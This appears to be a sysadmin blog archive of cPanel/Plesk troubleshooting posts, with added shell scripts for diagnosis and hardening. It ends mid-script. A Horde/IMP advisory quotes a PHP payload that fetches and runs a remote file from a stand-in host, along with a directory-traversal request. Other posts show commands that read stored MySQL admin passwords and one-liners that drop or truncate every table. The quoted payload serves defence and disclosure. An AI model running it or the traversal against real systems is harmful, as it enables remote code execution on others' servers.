Author Archives: Joel T Abraham

Issue with exim — require_files: Permission denied in logs ?

Facing issues sending or receiving mail on a cPanel server?

As always, the first place to check is /var/log/exim_mainlog.
If you spot something like this:

2014-04-30 17:07:34 H=(xxxx-122-106-xx-xx-co.in) [xx.xx.xx.xx]:55278 F= temporarily rejected RCPT : require_files: error for /home/account/etc/domain.com: Permission denied

This means the permissions or ownership of the path named in the log
(the account's mail configuration directory for that domain, which exim
must be able to read before it accepts mail for it) have been altered.
Confirm with ls -ld on that path: it should belong to the account user.

Fix it by running:

/scripts/mailperm 'account-name'

-- mailperm is a script provided by cPanel that resets the permissions
and ownership of the mail directories and files of the given account.
Check exim_mainlog again afterwards; the require_files rejections should stop.

Plesk upgrade to the latest stable version — Centos 5.x 64 bit arch

-- Plesk can be upgraded up to version 9.5.4 either from the Plesk control
panel or with the autoinstaller script:

# /usr/local/psa/admin/bin/autoinstaller

-- Up to that version it is straightforward.

-- Upgrading beyond it while the system PHP is older than 5.3 fails.
Here we upgrade Plesk using only the stock CentOS repositories, without
any third-party repository (Atomic included).

-- Starting from 9.5.4, run the installer again and select the same
version number (9.5.4):

# /usr/local/psa/admin/bin/autoinstaller

-- After selecting the version from the installation menu, the next page
shows a screen like this:

Please select the components of Parallels Plesk Panel you want to install:
………
………

Different PHP interpreter versions
14. (*) PHP5 support
15. ( ) PHP5.3 support

-- Select '15. ( ) PHP5.3 support' here and proceed with the installation.

-- At the end of it you have Plesk 9.5.4 with PHP 5.3 support, which is
the PHP the next upgrade step requires, without any extra repositories.

-- Even so, when you check the PHP version you get something like this:

PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib64/php/modules/sqlite.so' - /usr/lib64/php/modules/sqlite.so: cannot open shared object file: No such file or directory in Unknown on line 0

-- Ignore this warning for the moment.

-- Upgrade Plesk to 11.5 using the autoinstaller.

-- In the usual case there are no errors, other than the licence error,
which can be ignored.

-- Once the upgrade is complete, fix the sqlite.so problem. Quote the
pattern so the shell does not expand it:

# yum list 'php*sqlite*'

-- This is actually a Plesk packaging bug: the module is shipped as a
32-bit package even though CentOS and every other module are 64-bit.

-- To get around it, remove the 'php53-sqlite2' rpm and install the
64-bit build from the Plesk/RHEL distribution instead.

-- Remove it with rpm and --nodeps (not with yum, and not without
--nodeps, otherwise the Plesk packages that depend on it are removed too):

# rpm -e --nodeps php53-sqlite2

-- Download the 64-bit package (one line):

# wget http://plesk-autoinstall.mirror.serverloft.eu/PSA_10.1.1/dist-rpm-RedHat-el5-x86_64/opt/php53/php53-sqlite2-5.3.2-11011812.x86_64.rpm

-- Verify the package signature before installing anything fetched from a
mirror, then install it with:

# rpm -i php53-sqlite2-5.3.2-11011812.x86_64.rpm

-- Check php -v and make sure the startup warning is gone.

cPanel – Chkservd showing Exim/IMAP getting failed numerous times ?

-- Check the chkservd log (/var/log/chkservd.log) for something like this
in relation to exim:

==========================

>> AUTH PLAIN AF9fsdsdxcxcxcX19pspdivxc1k1MGJYek44eXpOMVliWkdOdFdfTVRWbjNPU29uADlBVEFlMG1MR0hsMVRESlI2WnFIZ3FRSDWWEXQ0dMYUlqZzVEbTFMYk1FQUpHJokUtTAn:DWQ=

<< 421 host.xxxx.com Service not available - closing connection exim: ** [421 host.xxxx.com: Service not available - closing connection != 2]

==========================

-- This shows that the check daemon failed to authenticate against exim with
the temporary service-auth key, so the check keeps failing.

-- As a side effect you will also see many SMTP authentication failures in
exim_mainlog, from valid and invalid IPs alike.

-- To fix it, remove the stale exim service-auth key so that cPanel
generates a fresh one:

# cd /var/cpanel/serviceauth/
# rm -rf exim
# service cpanel restart
# service exim restart

Monitor chkservd logs ( /var/log/chkservd.log ) and make sure things are fine !

Error when trying to FTP !

When connecting with FTP, do you get this error?

=================

Status: Resolving address of xxxxxxxxxxxxxxx.com
Status: Connecting to xx.xx.xx.xx:21…
Status: Connection established, waiting for welcome message…
Response: 421 Too many connections (x) from this IP

=================

As the response says, the limit on simultaneous connections from the IP
you are connecting from has been reached. Before raising it, check the
FTP log to make sure those connections really are yours (a client that
opens many parallel transfers) and not a brute-force attempt from that IP.

Increase the value in the configuration file: 'MaxClientsPerIP' in
/etc/pure-ftpd.conf for Pure-FTPd, or 'MaxClientsPerHost' in
/etc/proftpd.conf for ProFTPD, and restart the service. On cPanel the
same limit is exposed in WHM under FTP Server Configuration.

Alternatively, terminate the existing connections if they are idle:
list them with # netstat -plan | grep :21 and kill the corresponding
per-client process ( # kill PID, and only if it does not exit, # kill -9 PID ).
Do not kill the listening parent process; that stops the FTP service itself.

Error when enabling SMTP Restrictions – cPanel/WHM

SMTP restrictions prevent users from bypassing your mail server to send mail.
The feature configures the server so that the mail transport agent (MTA),
the Mailman mailing-list software and the root user are the only accounts
able to open outbound connections to remote SMTP servers (port 25); it is
implemented as an iptables rule that matches on the owner of the socket.

Enable from WHM as :

Home >> Security Center >> SMTP Restrictions

When enabling it, do you get this error?

An error occurred attempting to update this setting.
The SMTP restriction is disabled.

And when trying it from the command line,

# /scripts/smtpmailgidonly on

SMTP Mail protection has been disabled. All users may make smtp connections.
There was a problem setting up iptables. You either have an older kernel or a
broken iptables install, or ipt_owner could not be loaded.

In most cases the required iptables match module, 'ipt_owner' (called
'xt_owner' on kernels from 2.6.24 on), is not loaded or not available in
the kernel. You can confirm this with csf's module test, # /etc/csf/csftest.pl,
which reports whether the owner match works.

If your server is a VPS (OpenVZ/Virtuozzo containers in particular cannot
load kernel modules themselves), ask the provider to enable it for you.
If you manage the kernel yourself, load it with:

# modprobe ipt_owner

(or modprobe xt_owner on newer kernels), then run /scripts/smtpmailgidonly on
again and make the module load persistent across reboots.

Issue with NTP servers — The new DDoS target !!

Just as DDoS attacks hit web servers and DNS servers, they have started
hitting ntpd servers that are left open.

This is a very recent attack. The Network Time Protocol (NTP) syncs time
between machines on a network and runs on UDP port 123. It is typically
configured once by the network administrators and often never updated.

Recently there has been a major jump in attacks via this protocol. Attackers
employ NTP for DDoS much the way DNS is abused: they send small packets
with a spoofed source address, so that the large replies go to the DDoS
target's IP address. It all hinges on the 'monlist' command of older NTP
versions, a mode 7 (private) query that returns the last 600 hosts that
talked to the server; the reply is many times larger than the request.

To check whether your ntp service is open/vulnerable:

# ntpdc -c monlist IP ( if it returns a list of hosts, it is vulnerable )

To get around this:

# The easiest way is to update to ntp 4.2.7p26 or later, where monlist is
disabled entirely.

# If upgrading is not an option, add 'noquery' to the default restrict
lines in the NTP config file. This refuses mode 6 and 7 (control and
private) query packets, which include monlist, while ordinary time
requests from clients are still answered. Alternatively, add the line
'disable monitor' to ntp.conf, which switches off just the monitoring
facility that monlist reads from.

Add the below lines to /etc/ntp.conf :

========

restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery

========

If monolist query is disabled,

# ntpdc -n -c monlist IP should return,

xx.xx.xx.xx: timed out, nothing received
***Request timed out

The basic issue is that many ntp servers are left open, meaning any host
can query them. For example, the config file of an ntpd server has this
section:

============

# — CLIENT NETWORK ——-

============

-- under this section, either nothing is given (which means everyone can
access and query the daemon), or something like the following:

restrict 192.168.1.0 mask 255.255.255.0 notrust nomodify notrap

which still lets everyone query; only the specified range is barred from
those three actions, and even that range can still query.

So this still leaves an open ntpd service that answers monlist queries.

If instead the following is given,

restrict 192.168.1.0 mask 255.255.255.0 notrust noquery nomodify notrap

hosts in that network segment cannot query the daemon's status, but hosts
outside the segment are not covered by that line at all. That is why the
two 'restrict default' lines above matter: they apply to every source that
no more specific restrict line matches.

Before you become a link in the chain, take these preventive measures.
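As an added example (not part of the original post), here is a shell check that reads an ntp.conf and reports whether monlist is still reachable by arbitrary hosts, following the rules above: it passes when 'disable monitor' is set, or when both the IPv4 and IPv6 'restrict default' lines carry noquery. The two configuration files it runs against are constructed here; on a real server point it at /etc/ntp.conf.

```shell
#!/bin/sh
# Added example: decide from an ntp.conf whether mode 6/7 queries (monlist)
# are refused by default. Not from the original post.

# Print the 'restrict default' line(s) for address family FAM (4 or 6) of CONF.
restrict_default_lines() {
    fam=$1; conf=$2
    if [ "$fam" = 4 ]; then
        grep -E '^[[:space:]]*restrict[[:space:]]+(-4[[:space:]]+)?default([[:space:]]|$)' "$conf" || true
    else
        grep -E '^[[:space:]]*restrict[[:space:]]+-6[[:space:]]+default([[:space:]]|$)' "$conf" || true
    fi
}

# ntp_monlist_closed CONF -> 0 (closed) or 1 (open), with a one-line reason per family.
ntp_monlist_closed() {
    conf=$1
    # 'disable monitor' switches off the monitoring facility monlist reads from
    if grep -Eq '^[[:space:]]*disable([[:space:]]+[a-z]+)*[[:space:]]+monitor([[:space:]]|$)' "$conf"; then
        echo "closed: 'disable monitor' is set in $conf"
        return 0
    fi
    rc=0
    for fam in 4 6; do
        lines=$(restrict_default_lines "$fam" "$conf")
        if [ -z "$lines" ]; then
            echo "open: no 'restrict default' line for IPv$fam, everything is allowed"
            rc=1
        elif ! printf '%s\n' "$lines" | grep -q 'noquery'; then
            echo "open: IPv$fam default restrict lacks noquery: $lines"
            rc=1
        else
            echo "closed: IPv$fam default refuses queries"
        fi
    done
    return $rc
}

# Constructed configs: the typical 'only a LAN rule' file, and a fixed one.
weak_conf=$(mktemp)
cat >"$weak_conf" <<'EOF'
# --- CLIENT NETWORK ---
restrict 192.168.1.0 mask 255.255.255.0 notrust nomodify notrap
EOF
fixed_conf=$(mktemp)
cat >"$fixed_conf" <<'EOF'
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict -6 ::1
restrict 192.168.1.0 mask 255.255.255.0 notrust nomodify notrap
EOF

ntp_monlist_closed "$weak_conf"    # prints two 'open:' lines, returns 1
ntp_monlist_closed "$fixed_conf"   # prints two 'closed:' lines, returns 0
```

The check only reads the config; combine it with the ntpdc -c monlist test from outside the server, since a running ntpd may not have been restarted after the file was edited.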

Apache error_log – piling up with PHP errors ?

Is the error_log belonging to a domain growing to a huge size?

Check its contents and see if they look like this:

=============

[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JDispatcher::getInstance() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::load() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::register() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JPluginHelper::_import() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::import() should not be called statically in

……….
……….

=============

These are PHP Strict Standards notices. As every one of them is logged on
every request, error_log consumes a huge amount of space. (The JDispatcher
and JLoader entries above come from an old Joomla core; updating the
application is the real fix, the change below only silences the noise.)

This is a change in PHP 5.4, where E_STRICT became part of E_ALL, so
strict-standards notices are reported by default.

To get around it, exclude strict-standards notices from error reporting by
adding the line below to the PHP configuration file (the global php.ini,
or the per-domain php.ini when PHP runs as CGI/suPHP):

error_reporting = E_ALL & ~E_NOTICE & ~E_STRICT

An issue with exim — mails not getting delivered to certain mail-servers

Is exim failing to deliver mail to certain SMTP servers, Gmail for example?

The first place to check is /var/log/exim_mainlog; look for something like this:

=============

-bash-3.2# grep 1W6OuM-0005cl-J8 /var/log/exim_mainlog
2014-01-23 19:21:42 1W6OuM-0005cl-J8 <= root@host.xxxx. U=root P=local S=350 T=”test mail” for test@gmail.com
2014-01-23 19:21:42 cwd=/var/spool/exim 4 args: /usr/sbin/exim -v -Mc 1W6OuM-0005cl-J8
2014-01-23 19:21:42 1W6OuM-0005cl-J8 gmail-smtp-in.l.google.com [xxxx:abcd:xxxx:xab::xa] Network is unreachable
2014-01-23 19:21:43 1W6OuM-0005cl-J8 Completed

============

Exim is attempting delivery over IPv6. It does so whenever the recipient's
mail server publishes an IPv6 (AAAA) address, as Gmail does, and the sending
host has an IPv6 address of its own. If that address has no working route, as
in the log above, the attempt fails; if it works but has no reverse DNS, the
receiving server will often junk or reject the mail.

If IPv6 delivery is not intended and the DNS records for it (an AAAA record
for the host name and a matching PTR for the address) are not configured, the
recipient server cannot match the sending IPv6 address to a host name, and
delivery suffers.

To get around this, either configure the IPv6 DNS entries properly or force
exim to deliver only over IPv4 by adding the line below to the exim
configuration file ( /etc/exim.conf ). On cPanel that file is regenerated
from templates, so put the setting in through WHM's Exim Configuration
Manager (Advanced Editor) or it will be overwritten on the next rebuild.

disable_ipv6 = true

Finally restart exim.
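As an added example covering both this post and the require_files one above (not code from either post), the following shell functions triage exim_mainlog for the two symptoms: the paths exim refused because of 'require_files: Permission denied', with a check of the path owner against the expected account, and delivery attempts that failed with 'Network is unreachable' against an IPv6 address. The log excerpt is constructed to mirror the lines quoted in the posts; on a real server pass /var/log/exim_mainlog.

```shell
#!/bin/sh
# Added example: triage /var/log/exim_mainlog for the two exim problems
# described on this page. Not from the original posts; the sample log is constructed.

# Paths that exim's require_files check could not read (unique, sorted).
exim_require_files_paths() {
    sed -n 's/.*require_files: error for \([^:]*\): Permission denied.*/\1/p' "$1" | sort -u
}

# check_mail_path PATH ACCOUNT -> 0 if PATH exists and is owned by ACCOUNT,
# 1 on owner mismatch (the case /scripts/mailperm fixes), 2 if PATH is missing.
check_mail_path() {
    path=$1; account=$2
    if [ ! -e "$path" ]; then
        echo "missing: $path"
        return 2
    fi
    # GNU stat first, BSD stat as fallback
    owner=$(stat -c %U "$path" 2>/dev/null || stat -f %Su "$path")
    if [ "$owner" != "$account" ]; then
        echo "owner mismatch: $path is owned by $owner, expected $account (run /scripts/mailperm $account)"
        return 1
    fi
    echo "ok: $path is owned by $account"
}

# Number of delivery attempts that failed against an IPv6 literal.
exim_ipv6_unreachable_count() {
    grep -Eic '\[[0-9a-f]*:[0-9a-f:]*\] Network is unreachable' "$1" || true
}

# Constructed excerpt modelled on the lines quoted in the two posts.
sample_log=$(mktemp)
cat >"$sample_log" <<'EOF'
2014-04-30 17:07:34 H=(mail.example.net) [192.0.2.10]:55278 F=<a@example.net> temporarily rejected RCPT <u@example.com>: require_files: error for /home/account/etc/example.com: Permission denied
2014-04-30 17:08:02 H=(mail.example.net) [192.0.2.10]:55301 F=<b@example.net> temporarily rejected RCPT <v@example.com>: require_files: error for /home/account/etc/example.com: Permission denied
2014-01-23 19:21:42 1W6OuM-0005cl-J8 <= root@host.example U=root P=local S=350 T="test mail" for test@gmail.com
2014-01-23 19:21:42 1W6OuM-0005cl-J8 gmail-smtp-in.l.google.com [2001:db8::1b] Network is unreachable
2014-01-23 19:21:43 1W6OuM-0005cl-J8 Completed
EOF

echo "require_files paths:"; exim_require_files_paths "$sample_log"          # /home/account/etc/example.com
echo "IPv6 unreachable attempts: $(exim_ipv6_unreachable_count "$sample_log")"  # 1
for p in $(exim_require_files_paths "$sample_log"); do
    account=$(printf '%s\n' "$p" | sed -n 's#^/home/\([^/]*\)/.*#\1#p')
    check_mail_path "$p" "$account"     # on this host the path does not exist: 'missing'
done
```

The account name is taken from the /home/<account>/ prefix of the path, which is how cPanel lays out mail directories; if your layout differs, pass the account explicitly.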

Useful MySQL commands

To find the MySQL root/admin password (these files hold it in clear text:
keep them mode 0600 and root-owned, and never copy them elsewhere) :

cPanel server           : cat /root/.my.cnf ( username : root )
Plesk server             : cat /etc/psa/.psa.shadow ( username : admin )
DirectAdmin server  : cat /usr/local/directadmin/conf/mysql.conf

To login to MySQL :

mysql -u 'username' -p ( will prompt for password )
Password:

To create MySQL dump of a database :

mysqldump -u 'username' -p dbname > database_name.sql ( will prompt for password )

To create MySQL dump of all databases :

mysqldump -u 'username' -p --all-databases > all_databases.sql ( will prompt for password )

To restore all databases from the MySQL dump :

mysql -u username -p < all_databases.sql ( will prompt for password )

To restore a MySQL dump for a database :

mysql -u 'username' -p dbname < database_name.sql ( will prompt for password )

To restore a single database from dump of all databases :

mysql -u 'username' -p --one-database dbname < all_databases.sql ( will prompt for password )

To create MySQL dump of a single table in a database :

mysqldump -u 'username' -p dbname table_name > table_name.sql ( will prompt for password )

To restore the above table from MySQL dump :

mysql -u 'username' -p dbname < /path/to/table_name.sql ( will prompt for password )

One liner to truncate all tables in a db from MySQL ( credentials come from
/root/.my.cnf; table names are quoted so that names containing special
characters or reserved words work, and foreign-key checks are disabled
because truncating a referenced table fails otherwise ) :

mysql -Nse 'SHOW TABLES' DBNAME | while read -r table;
do mysql -e "SET FOREIGN_KEY_CHECKS=0; TRUNCATE TABLE \`$table\`" DBNAME; done

One liner to drop all tables in a db from MySQL ( there is no undo, so take a
mysqldump first ) :

mysql -Nse 'SHOW TABLES' DBNAME | while read -r table;
do mysql -e "SET FOREIGN_KEY_CHECKS=0; DROP TABLE \`$table\`" DBNAME; done

Protect your server from DDoS attacks – Part 2 !!

We have been talking about DDoS attacks directed at the web server all this
while ( http://letushare.com/protect-your-server-from-ddos-attacks )

Another headache is when these attacks are directed at our DNS service,
which is often called a DNS amplification attack.

In simple words, the attack can be explained as follows:

Someone asks you how to reach a particular destination. You are not sure of
the location either, so you ask your friends nearby, and if you get no answer
from them you are determined to find one somehow, and keep asking until you
do. ( Basically you do not know this 'someone' who asked for your help. )

And this 'someone' has not stopped there. He has asked the same question of
many other people who, like you, are determined to get an answer. And he
closed by saying: if you find out, please ring me on 111, a fake number
belonging to some unknown poor guy.

Similarly, an attacker spoofs the source IP address ( to the IP he wants to
DDoS, called the target, like the fake number 111 ) and sends your DNS server
a request to resolve a domain. Your DNS server has no details about it in
its local zones, so it goes out on the internet to resolve the domain, and as
the attacker sends more and more queries, the outgoing queries and the
replies grow beyond any limit.

Now, remember your server might be one of 10,000 whose replies the attacker
directs at the target ( because the source IP of every DNS query was spoofed
to the target's IP ).

So this sort of DDoS attack affects not only the 'target' but also every DNS
server taking part in it, as they are flooded with queries ( requests and
replies ).

Attackers typically request as much zone information as possible to maximise
the amplification. In most attacks of this type the spoofed queries are of
type "ANY", which returns all known records for a name in a single response.
Because the response is considerably larger than the request, the attacker
multiplies the traffic these DNS servers generate, and the amount of traffic
directed at the target ends up huge.

So, how can we prevent this from happening ?

Going back to our illustration: when that 'someone' asked you for help, it
was you who went off to find an answer. You could have said:

"I'm sorry, I don't know the route to that destination. Nor do I know you,
so I can't spend my time and energy assisting you."

This is where you make your DNS server a closed resolver.

More on this is found at http://letushare.com/169/

And suppose your DNS server is closed: it still receives the queries from
the attacker and still has to answer them (with a refusal); it just does
not take part in the amplification. Those replies too can hinder your
services if too many requests are directed at your server.

Here you can use iptables to rate-limit the queries reaching your DNS port.

First make sure the 'recent' match module (xt_recent, or ipt_recent on old
kernels) is loaded; it is what makes this aspect of iptables work.

The first rule moves all packets received on port 53 to a new chain:

# iptables -N block ( create a new chain )
# iptables -A INPUT -p udp --dport 53 -j block

Then,

# iptables -A block -m recent --set --name DNSQF --rsource ( record the source IP in a list named DNSQF )
# iptables -A block -m recent --update --seconds 5 --hitcount 15 --name DNSQF --rsource -j DROP ( match against that list and drop )

Together these drop further packets from a source once 15 have been seen
from it within any 5-second window (the 15th packet onward).

Note what is being counted: the source IP. In an amplification attack the
source is the spoofed victim, so this limits how much your server sends at
the victim, but it also throttles that address's legitimate queries. Newer
BIND releases have response rate limiting (RRL) built in, which is a better
fit for an authoritative server; the iptables rule is the quick, generic measure.

Using these rules in iptables can help reduce the traffic on your server
when DNS queries are directed at it, even when it is a closed resolver.
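As an added example (not the post's own commands), the script below applies the two rules above idempotently: it loads the recent match module, creates the chain only if it is missing and uses iptables -C so that re-running it does not duplicate rules. The chain name, window, hit count and list name are the post's values exposed as variables; DRY_RUN=1 prints the commands instead of executing them, which is also how it can be previewed without root.

```shell
#!/bin/sh
# Added example: idempotent version of the DNS rate-limit rules from the post.
# Not from the original page. Run as root; DRY_RUN=1 only prints the commands.

CHAIN=${CHAIN:-block}          # chain the post creates
WINDOW=${WINDOW:-5}            # seconds
HITS=${HITS:-15}               # packets per source per window before dropping
LIST=${LIST:-DNSQF}            # name of the 'recent' table

# Run iptables, or print what would be run.
ipt() {
    if [ -n "${DRY_RUN:-}" ]; then
        printf 'iptables %s\n' "$*"
    else
        iptables "$@"
    fi
}

# True if the rule already exists (iptables -C). In dry-run mode nothing exists.
rule_present() {
    [ -z "${DRY_RUN:-}" ] && iptables -C "$@" 2>/dev/null
}

# Append a rule only when an identical one is not already there.
ensure_rule() {
    rule_present "$@" || ipt -A "$@"
}

apply_dns_ratelimit() {
    if [ -z "${DRY_RUN:-}" ]; then
        # the 'recent' match is xt_recent on current kernels, ipt_recent on old ones
        modprobe xt_recent 2>/dev/null || modprobe ipt_recent 2>/dev/null || true
    fi
    ipt -N "$CHAIN" 2>/dev/null || true        # already exists on a re-run: fine
    ensure_rule INPUT -p udp --dport 53 -j "$CHAIN"
    ensure_rule "$CHAIN" -m recent --set --name "$LIST" --rsource
    ensure_rule "$CHAIN" -m recent --update --seconds "$WINDOW" --hitcount "$HITS" --name "$LIST" --rsource -j DROP
}

# Usage: sh dns_ratelimit.sh apply   (preview: DRY_RUN=1 sh dns_ratelimit.sh apply)
case "${1:-}" in
    apply) apply_dns_ratelimit ;;
esac
```

On a csf server, put the same rules in /etc/csf/csfpost.sh instead of running them by hand, otherwise a csf restart flushes them.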

MySQL server not starting ?

There are tons of causes for MySQL not starting, ranging from a full disk
to corrupted databases.

The first place to look for a clue is the error log
( /var/lib/mysql/hostname.err )

If the error looks something like this:

InnoDB: End of page dump
140104 12:33:19 InnoDB: Page checksum 2288969011, prior-to-4.0.14-form checksum 2949853821
InnoDB: stored checksum 492713095, prior-to-4.0.14-form stored checksum 2949853821
InnoDB: Page lsn 0 40542, low 4 bytes of lsn at page end 40542
InnoDB: Page number (if stored to page already) 47,
InnoDB: space id (if created with >= MySQL-4.1.1 and stored already) 0
InnoDB: Page may be an update undo log page
InnoDB: Page may be an index page where index id is 12
InnoDB: Also the page in the doublewrite buffer is corrupt.
InnoDB: Cannot continue operation.
InnoDB: You can try to recover the database with the my.cnf
InnoDB: option:
InnoDB: innodb_force_recovery=6

This is InnoDB reporting a corrupt page (the stored checksum does not match
the computed one) and, worse, the copy in the doublewrite buffer is corrupt
too, so it refuses to start. The innodb_force_recovery hint in the log is a
recovery aid, not a fix: set it to 1 in the [mysqld] section of /etc/my.cnf,
raise it one step at a time only until the server starts, take a mysqldump
of every InnoDB database, then remove the option and reload the dump. Values
of 4 and above can do further damage to the data files, and in those modes
InnoDB restricts writes, so never leave the setting in place.

Also check /etc/my.cnf for leftovers of an earlier recovery attempt or for
settings that do not match the storage engines actually in use.

Following can be an example:

innodb_force_recovery=4
default-storage-engine=MyISAM

Here MyISAM is the default storage engine, but an innodb_force_recovery
line is still in place from some earlier recovery, which keeps InnoDB in a
crippled mode; remove it once the recovery is done.

If no InnoDB tables exist on the server at all (check
information_schema.tables for engine = 'InnoDB' before deciding), the
following option in /etc/my.cnf lets MySQL start without InnoDB:
skip-innodb. With it set, any InnoDB table that does exist becomes
inaccessible, so do not use it as a shortcut around the corruption.

Apache error — No space left on device: Couldn’t create accept lock

Apache fails to start, or to create its locks, with one of these messages in
the error log:

[emerg] (28)No space left on device: Couldn't create accept lock
[notice] suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/suexec)
[crit] (28)No space left on device: mod_rewrite: Parent could not create RewriteLock file /usr/local/apache/logs/rewrite_lock
semget: [emerg] (28) No space left on device

You check the disk space and can easily confirm that it is not full.

The reason behind the message is SysV semaphores: the kernel has a limit on
the number of semaphore arrays (SEMMNI, the fourth value in
/proc/sys/kernel/sem), and arrays left behind by httpd processes that were
killed or crashed eventually use it all up, so semget() fails with ENOSPC.
You have to remove the stale semaphore arrays.

To list the active semaphore arrays, execute:

# ipcs -s
------ Semaphore Arrays --------
key        semid      owner      perms      nsems
0x00000000 366673220  apache     600        1
0x00000000 366706589  apache     600        1
0x00000000 366732358  apache     600        1
0x00000000 366734353  apache     600        1

To remove one, pass its semid (the second column, not a process id):

# ipcrm -s semid

Stop Apache cleanly first so that arrays still in use are not removed from
under it, clear the stale ones, then start Apache again. If it keeps
recurring, raise the limit with the kernel.sem sysctl.
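Rather than copying ids by hand, the shell functions below (an added example, not from the post) pull the semaphore ids owned by a given user out of ipcs -s output and remove them. The parser is exercised here on a constructed ipcs listing shaped like the one above; clear_sems runs the real ipcs/ipcrm and is only invoked when you pass 'clear' on the command line.

```shell
#!/bin/sh
# Added example: remove the semaphore arrays a crashed httpd left behind.
# Not from the original post. Column layout assumed: key semid owner perms nsems.

# Read ipcs -s output on stdin, print the semid of every array owned by OWNER.
sem_ids_for_owner() {
    awk -v o="$1" 'NF >= 4 && $3 == o && $2 ~ /^[0-9]+$/ { print $2 }'
}

# Remove every semaphore array owned by OWNER (default apache). Stop the web
# server first so that arrays still in use are not pulled from under it.
clear_sems() {
    owner=${1:-apache}
    ipcs -s | sem_ids_for_owner "$owner" | while read -r id; do
        ipcrm -s "$id" && echo "removed semid $id (owner $owner)"
    done
}

# Current semaphore limits: SEMMSL SEMMNS SEMOPM SEMMNI. SEMMNI is what semget
# runs out of when 'No space left on device' appears.
sem_limits() {
    cat /proc/sys/kernel/sem 2>/dev/null || sysctl -n kernel.sem
}

# Constructed listing shaped like the 'ipcs -s' output in the post.
sample_ipcs='------ Semaphore Arrays --------
key        semid      owner      perms      nsems
0x00000000 366673220  apache     600        1
0x00000000 366706589  apache     600        1
0x00000000 98304      mysql      600        1'

echo "apache semids in the sample:"
printf '%s\n' "$sample_ipcs" | sem_ids_for_owner apache    # 366673220 and 366706589

# Usage: sh clear_sems.sh clear [owner]
case "${1:-}" in
    clear) clear_sems "${2:-apache}" ;;
esac
```

Pass the user Apache runs as (nobody on many cPanel builds, apache on stock CentOS); the owner column is what the filter keys on, so nothing belonging to MySQL or other services is touched.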

 

A cPanel bug ( for version — 11.40 ) with clamAV

Getting the following error message ?

===========

Original Message --------
Subject: Cron /usr/local/cpanel/3rdparty/bin/freshclam --quiet --no-warnings
From: (Cron Daemon)
To: root@hostname
Date: 12/12/2013 04:38
> ERROR: Can't create temporary directory

/usr/local/cpanel/3rdparty/share/clamav/clamav-xxxxx.tmp

===========

This is a known bug in cPanel 11.40.

Although the directory '/usr/local/cpanel/3rdparty/share/clamav' has the
expected permissions and ownership, freshclam is not able to create the
temporary files and folders it needs there.

A temporary workaround is to change the ownership of the directory to the
user freshclam runs as, as shown below:

==========

chown clamav:clamav /usr/local/cpanel/3rdparty/share/clamav

==========

A vulnerability with older versions of Horde/IMP in Plesk !

The Horde/IMP package (3.1.7 to 3.3.2) shipped with Plesk 8.x and with 9.x
before 9.5.4 has a vulnerability that lets an attacker run code by submitting
a login POST to /horde/imp/redirect.php with PHP code as the username, for
example:

<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt; perl new.txt;rm -rf new.txt"); ?>

The failed login is written, PHP code included, to
/var/log/psa-horde/psa-horde.log. A directory-traversal flaw in barcode.php
then lets the attacker make Horde include and execute that log file with a
request like this:

/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

This is what the attacker's two requests look like in the web server access log:

xx.xx.xx.xx - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"

xx.xx.xx.xx - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?

Resolution

The resolution suggested by Parallels is to download the patch for Horde and
place it in /usr/share/psa-horde/lib/Horde/

The patch can be obtained from:

http://kb.parallels.com/Attachments/19039/Attachments/patch%20Horde%203.1.7.zip

Upgrading Plesk to 9.5.4 or later, which ships a fixed Horde, is the
longer-term fix. Either way, check the access log and psa-horde.log for the
two signs above: if both are present the payload has most likely already
run as the web server user, and the server needs an incident response, not
just the patch.
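As an added example (not from the post or from Parallels), here are shell functions that look for the two traces this attack leaves: PHP tags or call names written into psa-horde.log through the login name, and barcode.php requests whose type parameter carries directory traversal in the Apache access log. Both log excerpts are constructed (the psa-horde.log line format is simplified); on a real server point them at /var/log/psa-horde/psa-horde.log and at the access log of the domain or of the Plesk webmail host.

```shell
#!/bin/sh
# Added example: indicators of the Horde/IMP log-poisoning + barcode.php
# traversal attack. Not from the original post; the sample logs are constructed.

# Lines of the Horde log that carry PHP code (the poisoned login name).
horde_log_poisoning() {
    grep -niE '<\?php|passthru\(|shell_exec\(|system\(|eval\(' "$1" || true
}

# Access-log requests to barcode.php whose type= parameter traverses
# directories (plain ../ or URL-encoded %2e%2e%2f).
horde_barcode_traversal() {
    grep -niE 'barcode\.php\?[^ "]*type=[^ "]*(\.\./|%2e%2e%2f)' "$1" || true
}

# horde_ioc_scan HORDELOG ACCESSLOG -> 0 when clean, 1 when either indicator is found.
horde_ioc_scan() {
    hits=0
    p=$(horde_log_poisoning "$1")
    [ -n "$p" ] && { echo "PHP code in $1:"; printf '%s\n' "$p"; hits=1; }
    t=$(horde_barcode_traversal "$2")
    [ -n "$t" ] && { echo "barcode.php traversal in $2:"; printf '%s\n' "$t"; hits=1; }
    [ "$hits" -eq 0 ] && echo "clean"
    return $hits
}

# Constructed samples (format of psa-horde.log simplified).
horde_log=$(mktemp); access_log=$(mktemp)
cat >"$horde_log" <<'EOF'
Jan 17 08:01:19 HORDE [error] [imp] FAILED LOGIN 203.0.113.5 to localhost as alice
Jan 17 08:01:19 HORDE [error] [imp] FAILED LOGIN 203.0.113.5 to localhost as <?php passthru("id"); ?>
EOF
cat >"$access_log" <<'EOF'
203.0.113.5 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
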